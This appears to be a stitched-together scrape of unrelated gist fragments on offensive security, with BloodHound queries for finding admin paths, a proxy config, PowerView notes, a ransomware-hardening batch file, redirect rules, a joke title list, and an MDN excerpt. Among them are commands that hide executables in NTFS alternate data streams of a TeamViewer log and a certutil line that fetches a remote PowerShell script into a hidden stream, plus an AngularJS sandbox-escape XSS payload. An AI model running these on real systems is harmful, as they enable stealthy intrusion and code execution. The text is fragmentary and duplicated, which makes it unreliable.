MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup
{ | |
"mode": "patterns", | |
"proxySettings": [ | |
{ | |
"address": "127.0.0.1", | |
"port": 8080, | |
"username": "", | |
"password": "", | |
"type": 1, | |
"title": "127.0.0.1:8080", |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
The EventSource API
The EventSource interface is used to receive server-sent events. It connects to a server over HTTP and receives events in text/event-stream format without closing the connection.
https://developer.mozilla.org/en-US/docs/Web/API/EventSource
Last-Event-ID
Setting an ID lets the browser keep track of the last event fired so that if, the connection to the server is dropped, a special HTTP header (Last-Event-ID) is set with the new request.
:: | |
::####################################################################### | |
:: | |
:: Change file associations to protect against common ransomware attacks | |
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell | |
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) | |
:: --------------------- | |
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" | |
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1" |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets |
😒🙅🙄 | |
$thing for fun and profit | |
all your $thing are belong to $shutup | |
honey I $verbed the $thing | |
$thing demystified | |
$thing: a deep dive | |
$verb all the things | |
make $thing great again | |
$x and $y and $z, oh my! |
#Angular Sandbox Escapes Cheatsheet
Source: XSS without HTML: Client-Side Template Injection with AngularJS
1.0.1 - 1.1.5 Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1